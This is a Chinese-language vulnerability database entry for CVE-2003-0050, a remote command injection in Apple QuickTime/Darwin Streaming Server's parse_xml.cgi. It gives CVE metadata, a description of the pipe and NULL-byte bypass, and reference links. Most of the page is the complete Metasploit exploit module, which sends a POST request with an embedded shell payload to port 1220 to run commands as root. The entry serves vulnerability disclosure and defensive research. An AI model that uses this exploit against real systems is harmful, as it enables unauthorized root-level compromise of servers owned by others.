Apple Quicktime/Darwin流服务器parse_xml.cgi远程命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1119593 漏洞类型 输入验证
发布时间 2010-07-03 更新时间 2010-07-03
CVE编号 CVE-2003-0050 CNNVD-ID CNNVD-200303-039
漏洞平台 CGI CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/16891
https://www.securityfocus.com/bid/6954
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200303-039
|漏洞详情
AppleDarwin和QuickTime流管理服务器是基于WEB的服务,允许管理员管理Darwin和QuickTime流服务器,默认情况下,这些服务以root用户权限监听1220/TCP端口。Darwin/QuickTime流服务器不充分过滤用户提交的输入,远程攻击者可以利用这个漏洞以流服务器进程权限在系统上执行任意命令。Darwin流管理服务器依靠parse_xml.cgi应用程序来验证和与用户交互,此CGI由PERL编写,直接传递没有进行充分处理的输入给open()函数,当管道'|'字符插入到输入的时候可导致open()函数执行嵌入的命令,参数的输入可通过GET请求提交给CGI。新版本的Darwin流管理服务器提供了部分过滤,但是插入NULL字符在命令最后一个字符和管道之间,可绕过检查,以流服务器进程权限在系统上执行任意命令。
|漏洞EXP
##
# $Id: qtss_parse_xml_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
			'Description'    => %q{
					The QuickTime Streaming Server contains a CGI script that is vulnerable
				to metacharacter injection, allow arbitrary commands to be executed as root.
				},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'OSVDB', '10562'],
					[ 'BID', '6954' ],
					[ 'CVE', '2003-0050' ]
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 24 2003'
		))

		register_options(
			[
				Opt::RPORT(1220)
			], self.class)
	end

	def exploit

		print_status("Sending post request with embedded command...")

		data = "filename=" + Rex::Text.uri_encode(";#{payload.encoded}|")

		response = send_request_raw({
			'uri'	  => "/parse_xml.cgi",
			'method'  => 'POST',
			'data'    => data,
			'headers' =>
			{
				'Content-Type'	 => 'application/x-www-form-urlencoded',
				'Content-Length' => data.length,
			}
		}, 3)

		# If the upload worked, the server tries to redirect us to some info
		# about the file we just saved
		if response and response.code != 200
			print_error("Server returned non-200 status code (#{response.code})")
		end

		handler
	end
end
|受影响的产品
Apple Darwin Streaming Server 4.1.2
|参考资料

来源:BUGTRAQ
名称:20030224QuickTime/DarwinStreamingAdministrationServerMultiplevulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104618904330226&w=2
来源:XF
名称:quicktime-darwin-command-execution(11401)
链接:http://www.iss.net/security_center/static/11401.php
来源:lists.apple.com
链接:http://lists.apple.com/archives/security-announce/2003/Feb/25/applesa20030225macosx102.txt
来源:BID
名称:6954
链接:http://www.securityfocus.com/bid/6954